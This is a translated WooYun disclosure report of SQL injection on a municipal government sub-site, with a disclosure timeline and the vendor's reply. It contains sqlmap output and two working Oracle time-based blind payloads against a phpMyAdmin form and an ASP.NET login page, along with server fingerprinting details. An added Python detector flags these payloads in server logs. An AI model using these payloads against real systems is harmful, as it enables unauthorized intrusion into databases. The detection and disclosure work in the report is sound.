Vulnerability summary
Title: A sub-site of a municipal government website has a POST injection vulnerability
Submitted: 2016-01-17 16:28
Fixed: 2016-02-27 11:49
Published: 2016-02-27 11:49
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 12
Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling
Tags: none
Vulnerability details
Disclosure status:
2016-01-17: Details sent to the vendor, awaiting the vendor's handling
2016-01-20: Vendor confirmed; details visible to the vendor only
2016-01-30: Details disclosed to core white hats and experts in the relevant field
2016-02-09: Details disclosed to regular white hats
2016-02-19: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
Brief description: See title.
Detailed description: The phpMyAdmin location is exposed at http://**.**.**.**/db/index.php, version 2.11.1. Injection point: "http://**.**.**.**/db/index.php?lang=zh-gb2312&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=2cf2e60511edfbfdd010d7be7ad32f33"
POST data: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8859-1
do you want to test this form? [Y/n/q] > y
Edit POST data [default: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8859-1] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] n
[15:44:44] [INFO] using 'C:\sqlmap\output\**.**.**.**\session' as session file
[15:44:44] [INFO] resuming injection data from session file
[15:44:44] [INFO] resuming back-end DBMS 'oracle' from session file
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: server
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: collation_connection=utf8_unicode_ci&convcharset=iso-8859-1&server=1) AND 9468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(111)||CHR(117)||CHR(74),5) AND (6861=6861&lang=zh-gb2312
---
do you want to exploit this SQL injection? [Y/n] y
[15:44:47] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Oracle
Second injection site: http://**.**.**.**/IPhone4/Login.aspx
Request:
POST /IPhone4/Login.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 369
Cache-Control: max-age=0
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
Referer: http://**.**.**.**/IPhone4/Login.aspx
Accept-Encoding: gzip, deflate

__VIEWSTATE=%2FwEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr%2F&__EVENTVALIDATION=%2FwEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=13888888888&btnLogin.x=37&btnLogin.y=23&txtUserPwd=6666

Response headers:
Cache-Control → private, max-age=10800, pre-check=10800
Connection → close
Content-Type → text/html; charset=gb2312
Date → Sun, 10 Jan 2016 14:24:30 GMT
Expires → Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified → Thu, 20 Sep 2007 16:35:26 GMT
Server → Microsoft-IIS/6.0
X-Powered-By → ASP.NET
Proof of vulnerability:
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr/') AND 4326=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(104)||CHR(88)||CHR(90),5) AND ('JHjr'='JHjr&__EVENTVALIDATION=/wEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=&btnLogin.x=1&btnLogin.y=1&txtUserPwd=
---
A search-engine query shows that the "移动办公申报平台" (mobile office filing platform) is deployed on multiple sites.
Test parameter: __VIEWSTATE
Host IP: **.**.**.**
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
I guess injection type is Integer?!
If injection failed, retry with a manual keyword.
DB Server: Oracle
Page Found: http://**.**.**.**/login.html N
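Both injection points above share one Oracle time-based blind pattern: DBMS_PIPE.RECEIVE_MESSAGE used as a sleep primitive, CHR()||CHR() concatenation to build the pipe name without quote characters, and a tautology tail such as AND (6861=6861 or AND ('JHjr'='JHjr. The Python below is an added example from the defender's side, not part of the original report nor of sqlmap or Havij: it scans form-encoded POST bodies from a web-server log for those three signatures and correlates the sleep timeout the probe declares with the observed response time, which is how a probe that the database actually executed shows up in logs. The log-record layout (path, body, elapsed_ms) and the sample records are constructed assumptions modelled on the two bodies in the report.

```python
"""Log-review detector for the Oracle time-based blind SQL injection probes
seen in the report.  Added example, not part of the original report or of the
tools it quotes; the log record layout (path, body, elapsed_ms) is an assumption."""
import re
from urllib.parse import parse_qsl

# Oracle sleep primitive: DBMS_PIPE.RECEIVE_MESSAGE(<pipe name>, <timeout seconds>).
# The first argument may itself contain CHR(..) calls, so one level of nested
# parentheses is allowed before the comma; the timeout is captured in group 1.
DBMS_PIPE_SLEEP = re.compile(
    r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\((?:[^,()]|\([^()]*\))*,\s*(\d+)\s*\)", re.I)
# CHR(n)||CHR(n) concatenation: string building without quote characters.
CHR_CONCAT = re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|\s*CHR\s*\(", re.I)
# Tautology tails that close the injected condition: AND (6861=6861, AND ('x'='x
TAUTOLOGY_NUM = re.compile(r"\b(?:AND|OR)\s*\(?\s*(\d+)\s*=\s*\1\b", re.I)
TAUTOLOGY_STR = re.compile(r"\b(?:AND|OR)\s*\(?\s*'([^']*)'\s*=\s*'\1\b", re.I)

SIGNATURES = {
    "oracle_dbms_pipe_sleep": DBMS_PIPE_SLEEP,
    "chr_concat": CHR_CONCAT,
    "tautology_numeric": TAUTOLOGY_NUM,
    "tautology_string": TAUTOLOGY_STR,
}


def scan_body(body):
    """Map each form field whose decoded value matches a signature to the list of
    signature names it matched.  Fields are decoded individually, so URL-encoded
    variants (%7C%7C for ||, + for space) are caught as well as raw ones."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


def declared_delay_seconds(body):
    """Largest timeout passed to DBMS_PIPE.RECEIVE_MESSAGE in any field, or None."""
    delays = [int(m.group(1))
              for _, value in parse_qsl(body, keep_blank_values=True)
              for m in DBMS_PIPE_SLEEP.finditer(value)]
    return max(delays) if delays else None


def triage(record):
    """Classify one log record.  'confirmed-time-delay' means the response took at
    least as long as the probe asked the database to sleep, the tell-tale of an
    injected statement that was actually executed; 'probe' means the payload was
    seen but the timing does not show that it ran."""
    findings = scan_body(record["body"])
    if not findings:
        return {"verdict": "clean", "findings": {}, "declared_delay_s": None}
    delay = declared_delay_seconds(record["body"])
    if delay is not None and record["elapsed_ms"] >= delay * 1000:
        verdict = "confirmed-time-delay"
    else:
        verdict = "probe"
    return {"verdict": verdict, "findings": findings, "declared_delay_s": delay}


def triage_log(records):
    """Run triage over a list of records and return the results in order."""
    return [triage(r) for r in records]


# Constructed sample records modelled on the two POST bodies in the report.
SAMPLE_LOG = [
    # Ordinary login: no signature expected.
    {"path": "/IPhone4/Login.aspx", "elapsed_ms": 120,
     "body": "__VIEWSTATE=%2FwEPDwUK&txtUserCode=13888888888&txtUserPwd=6666"},
    # Raw probe through the 'server' field; the response took the 5 s it asked for.
    {"path": "/db/index.php", "elapsed_ms": 5240,
     "body": "server=1) AND 9468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(111)"
             "||CHR(117)||CHR(74),5) AND (6861=6861&lang=zh-gb2312"},
    # URL-encoded probe through __VIEWSTATE; the fast answer shows the payload
    # was seen but the timing gives no evidence that the database executed it.
    {"path": "/IPhone4/Login.aspx", "elapsed_ms": 90,
     "body": "__VIEWSTATE=%2FwEPDwUK%27%29+AND+4326%3DDBMS_PIPE.RECEIVE_MESSAGE%28"
             "CHR%28117%29%7C%7CCHR%28104%29%2C5%29+AND+%28%27JHjr%27%3D%27JHjr"
             "&txtUserCode="},
]

if __name__ == "__main__":
    for rec, result in zip(SAMPLE_LOG, triage_log(SAMPLE_LOG)):
        print(rec["path"], rec["elapsed_ms"], "ms ->", result["verdict"], result["findings"])
```

The timing correlation is the part worth keeping even if the signatures are tuned down: a request whose declared sleep matches the server's response time is evidence that the injected SQL reached the database, whereas a signature hit with a fast response only tells you that someone is probing.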
Fix recommendation:
Copyright notice: please credit the source when reposting: 路人甲 @乌云 (WooYun)
Vulnerability response
Vendor response: Severity: High
Vulnerability Rank: 10
Confirmed: 2016-01-20 14:48
Vendor reply: CNVD confirmed that it could not reproduce the described situation; the case has been passed via CNCERT to the Guangdong branch centre, which will coordinate handling with the website's administering unit.
Latest status: none yet